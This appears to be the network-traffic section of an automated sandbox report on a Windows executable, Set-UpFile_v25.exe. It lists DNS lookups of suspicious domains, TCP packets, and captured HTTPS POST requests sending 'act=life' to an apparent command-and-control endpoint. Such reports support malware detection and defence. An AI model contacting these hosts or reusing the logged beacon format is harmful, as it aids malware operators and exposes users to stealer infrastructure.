                                                                                                                                                              Jan 7, 2025 14:37:11.659068108 CET44349748104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:11.659198046 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:11.665258884 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:11.665275097 CET44349748104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:11.665540934 CET44349748104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:11.713156939 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:11.717955112 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:11.717983007 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:11.718099117 CET44349748104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.141786098 CET44349748104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.141906023 CET44349748104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.142030001 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.144071102 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.144094944 CET44349748104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.144115925 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.144121885 CET44349748104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.152410030 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.152465105 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.152559042 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.152854919 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.152864933 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.609733105 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.609951973 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.611422062 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.611443996 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.611681938 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:12.613076925 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.613126040 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:12.613157988 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.061485052 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.061542988 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.061582088 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.061611891 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.061619043 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.061650991 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.061671019 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.062031984 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.062088013 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.062098980 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.062314034 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.062350988 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.062364101 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.062371016 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.062459946 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.062467098 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.066183090 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.066243887 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.066251993 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.119429111 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.148682117 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.148752928 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.148781061 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.148864031 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.148886919 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.148935080 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.169214010 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.169333935 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.169403076 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.169619083 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.169636011 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.169660091 CET49749443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.169665098 CET44349749104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.442698956 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.442750931 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.442848921 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.443205118 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.443212032 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.913685083 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.913865089 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.915172100 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.915182114 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.915381908 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.916640043 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.916810036 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.916826010 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.916882992 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.916887999 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.520318985 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.520423889 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.520539999 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.520746946 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.520766973 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.665724993 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.665781975 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.665882111 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.666219950 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.666227102 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.152338028 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.152429104 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.153763056 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.153775930 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.154021978 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.155183077 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.155296087 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.155339956 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.629117966 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.629216909 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.629342079 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.629659891 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.629682064 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.917972088 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.918025017 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.918101072 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.918910027 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.918926001 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.395775080 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.395868063 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.397279978 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.397290945 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.397551060 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.398639917 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.398781061 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.398811102 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.398874044 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.398881912 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:21.788935900 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:21.789031982 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:21.789160967 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:21.789366961 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:21.789383888 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.303819895 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.303870916 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.303960085 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.304264069 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.304277897 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.773472071 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.773652077 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.775212049 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.775224924 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.775470972 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.776906967 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.777043104 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.777076006 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.549746037 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.549855947 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.549932003 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.595263004 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.595335960 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.878432989 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.878473997 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.878544092 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.943556070 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.943584919 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.415503979 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.415568113 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.417109013 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.417119026 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.417362928 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.418783903 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.418927908 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.418932915 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.859766006 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.859910011 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.859961987 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.860280037 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.860295057 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:25.576251984 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:25.576284885 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:25.576360941 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:25.576730967 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:25.576744080 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.047687054 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.047768116 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.049245119 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.049251080 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.049484015 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.051048994 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.051904917 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.051933050 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.052347898 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.052373886 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.052474022 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.052489042 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.053055048 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053071022 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.053195953 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053217888 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.053375959 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053392887 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.053402901 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053520918 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053541899 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.062611103 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.062872887 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.062891006 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.062907934 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.062963963 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.063002110 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.063158035 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.063361883 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.063391924 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.063402891 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.068228006 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:27.658402920 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:27.658498049 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:27.658566952 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:27.658850908 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:27.658864975 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:27.688219070 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:27.688271046 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:27.688366890 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:27.688714027 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:27.688726902 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.145315886 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.145395041 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:28.150253057 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:28.150280952 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.150542974 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.152039051 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:28.152071953 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:28.152136087 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.640237093 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.640336990 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.640408993 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:28.640670061 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:28.640693903 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.640707016 CET49757443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:28.640717983 CET44349757104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.750890017 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                              Jan 7, 2025 14:37:28.750922918 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.750992060 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                              Jan 7, 2025 14:37:28.751362085 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                              Jan 7, 2025 14:37:28.751374960 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:29.414772987 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:29.414834976 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                              Jan 7, 2025 14:37:29.416871071 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                              Jan 7, 2025 14:37:29.416881084 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:29.417114019 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:29.418895960 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                              Jan 7, 2025 14:37:29.459341049 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:29.681477070 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:29.681539059 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:29.681587934 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                              Jan 7, 2025 14:37:29.681807041 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                              Jan 7, 2025 14:37:29.681827068 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:29.681839943 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                              Jan 7, 2025 14:37:29.681845903 CET44349758185.161.251.21192.168.2.4

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 7, 2025 14:37:11.142642021 CET6348153192.168.2.41.1.1.1
                                                                                                                                                              Jan 7, 2025 14:37:11.162782907 CET53634811.1.1.1192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:28.644005060 CET5710653192.168.2.41.1.1.1
                                                                                                                                                              Jan 7, 2025 14:37:28.750129938 CET53571061.1.1.1192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:29.705832005 CET5095753192.168.2.41.1.1.1
                                                                                                                                                              Jan 7, 2025 14:37:29.715138912 CET53509571.1.1.1192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:30.804349899 CET5865853192.168.2.41.1.1.1
                                                                                                                                                              Jan 7, 2025 14:37:30.818614006 CET53586581.1.1.1192.168.2.4

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Jan 7, 2025 14:37:11.142642021 CET192.168.2.41.1.1.10x611Standard query (0)beattalkerz.cyouA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 7, 2025 14:37:28.644005060 CET192.168.2.41.1.1.10xd62aStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 7, 2025 14:37:29.705832005 CET192.168.2.41.1.1.10xc8b6Standard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 7, 2025 14:37:30.804349899 CET192.168.2.41.1.1.10x7106Standard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Jan 7, 2025 14:37:11.162782907 CET1.1.1.1192.168.2.40x611No error (0)beattalkerz.cyou104.21.25.52A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 7, 2025 14:37:11.162782907 CET1.1.1.1192.168.2.40x611No error (0)beattalkerz.cyou172.67.222.183A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 7, 2025 14:37:28.750129938 CET1.1.1.1192.168.2.40xd62aNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 7, 2025 14:37:29.715138912 CET1.1.1.1192.168.2.40xc8b6Name error (3)klipvumisui.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 7, 2025 14:37:30.818614006 CET1.1.1.1192.168.2.40x7106Name error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • beattalkerz.cyou
                                                                                                                                                              • cegu.shop

                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.449748104.21.25.524437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:11 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 8
                                                                                                                                                              Host: beattalkerz.cyou
                                                                                                                                                              2025-01-07 13:37:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                              2025-01-07 13:37:12 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:12 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=s6uksiqju9rtuumh4hiuk4dr19; expires=Sat, 03 May 2025 07:23:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iToJptAAeGYa0tDCCR4EurRsl8PZ0MIZQPj9bqfNLjD09OEjMxxgm%2F1F%2Fla0rlJJfGlH54kEVeiw1eW%2B%2FXc7GNRjOJDbB64RXO1AsKHo1QKBfh9pikLmdIZwwzwPhqAKr4MH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe45750993b7c99-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1940&rtt_var=746&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1449131&cwnd=235&unsent_bytes=0&cid=fd93a1480967260c&ts=496&x=0"
                                                                                                                                                              2025-01-07 13:37:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                              2025-01-07 13:37:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.449749104.21.25.524437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:12 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
